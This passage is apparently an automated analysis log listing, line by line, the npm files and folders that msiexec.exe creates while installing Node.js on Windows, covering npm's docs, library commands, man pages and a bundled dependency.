                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\folders.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\install.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\npm-shrinkwrap-json.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\npmrc.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\package-json.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\package-lock-json.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\config.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\dependency-selectors.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\developers.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\logging.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\orgs.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\package-spec.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\registry.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\removal.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\scope.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\scripts.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\workspaces.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\arborist-cmd.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\base-command.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\cli-entry.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\cli.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\lifecycle-cmd.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\npm.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\package-url-cmd.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\access.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\adduser.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\audit.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\bugs.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\cache.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\ci.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\completion.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\config.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\dedupe.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\deprecate.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\diff.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\dist-tag.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\docs.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\doctor.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\edit.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\exec.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\explain.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\explore.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\find-dupes.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\fund.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\get.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\help-search.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\help.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\hook.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\init.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\install-ci-test.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\install-test.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\install.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\link.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\ll.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\login.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\logout.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\ls.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\org.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\outdated.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\owner.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\pack.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\ping.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\pkg.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\prefix.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\profile.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\prune.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\publish.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\query.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\rebuild.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\repo.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\restart.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\root.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\run-script.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\sbom.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\search.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\set.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\shrinkwrap.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\star.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\stars.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\start.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\stop.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\team.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\test.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\token.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\uninstall.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\unpublish.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\unstar.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\update.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\version.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\view.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\whoami.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\es6
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\es6\validate-engines.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\audit-error.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\auth.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\cmd-list.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\completion.fish
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\completion.sh
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\did-you-mean.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\display.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\error-message.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\exit-handler.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\explain-dep.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\explain-eresolve.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\format-bytes.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\format-search-stream.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\get-identity.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\is-windows.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\log-file.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\log-shim.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\npm-usage.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\open-url-prompt.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\open-url.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\otplease.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\ping.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\pulse-till-done.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\queryable.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\read-user-info.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\reify-finish.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\reify-output.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\replace-info.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\sbom-cyclonedx.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\sbom-spdx.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\tar.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\timers.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\update-notifier.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\validate-lockfile.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\web-auth.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\completion
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\completion\installed-deep.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\completion\installed-shallow.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\workspaces
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\workspaces\get-workspaces.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\workspaces\update-workspaces.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-access.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-adduser.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-audit.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-bugs.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-cache.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-ci.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-completion.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-config.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-dedupe.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-deprecate.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-diff.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-dist-tag.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-docs.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-doctor.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-edit.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-exec.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-explain.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-explore.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-find-dupes.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-fund.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-help-search.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-help.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-hook.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-init.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-install-ci-test.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-install-test.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-install.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-link.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-login.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-logout.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-ls.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-org.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-outdated.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-owner.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-pack.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-ping.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-pkg.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-prefix.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-profile.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-prune.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-publish.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-query.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-rebuild.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-repo.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-restart.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-root.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-run-script.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-sbom.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-search.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-shrinkwrap.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-star.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-stars.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-start.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-stop.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-team.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-test.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-token.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-uninstall.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-unpublish.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-unstar.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-update.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-version.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-view.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-whoami.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npx.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\folders.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\install.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\npm-global.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\npm-json.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\npm-shrinkwrap-json.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\npmrc.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\package-json.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man5\package-lock-json.5
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\config.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\dependency-selectors.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\developers.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\logging.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\orgs.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\package-spec.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\registry.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\removal.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\scope.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\scripts.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man7\workspaces.7
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\LICENSE
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\package.json
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\safe.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\examples
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\examples\normal-usage.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\examples\safe-string.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\colors.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\extendStringPrototype.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\index.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\styles.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\custom
